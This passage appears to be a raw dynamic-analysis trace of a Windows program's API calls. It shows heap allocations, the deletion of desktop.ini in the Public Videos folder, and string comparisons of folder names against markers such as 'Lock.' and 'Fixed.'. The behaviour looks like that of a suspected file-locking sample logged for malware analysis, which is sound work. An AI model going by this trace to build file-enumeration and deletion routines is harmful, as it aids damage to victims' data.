lpBuffer="C:\\Users\\Public\\Videos\\desktop.ini", lpFilePart=0x8bedfc*="desktop.ini") returned 0x22 [0268.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499760 | out: hHeap=0x25c0000) returned 1 [0268.417] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 0x26 [0268.417] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa5820 [0268.417] DeleteFileW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 1 [0268.418] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0268.418] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0268.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.419] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0268.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0268.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0268.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0268.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0268.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0268.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0268.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0268.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0268.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0268.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0268.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0268.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0268.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0268.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0268.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x46) returned 0x2499760 [0268.422] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\Public\\Videos\\desktop.ini", lpFilePart=0x8bf658*="desktop.ini") returned 0x22 [0268.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499760 | out: hHeap=0x25c0000) returned 1 [0268.422] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 0xffffffff [0268.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0268.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.422] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0268.422] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.423] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0268.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0268.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0268.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0268.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0268.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0268.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sample Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ample Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mple Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ple Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="le Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0268.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0268.426] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0268.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0268.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0268.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0268.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0268.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0268.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0268.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0268.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6a58 [0268.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0268.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sample Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ample Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mple Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ple Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="le Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0268.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0268.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0268.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0268.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0268.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0268.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0268.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0268.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0268.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0268.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0268.430] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0268.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0268.431] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0268.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0268.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0268.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0268.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18a8 [0268.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0268.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0268.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0268.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0268.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0268.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.433] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0268.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0268.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0268.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0268.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0268.434] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0268.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0268.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0268.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.434] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0268.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.435] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0268.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.435] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos/Sample Videos", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0530, dwReserved1=0x1467b, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0xaa5820 [0268.436] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0268.436] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.437] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.437] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0268.437] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0268.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0268.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0268.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0268.438] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0268.438] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.438] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0268.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0268.439] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.439] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0268.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0268.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.440] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.440] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.440] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0268.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0268.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.441] PeekMessageW (in: 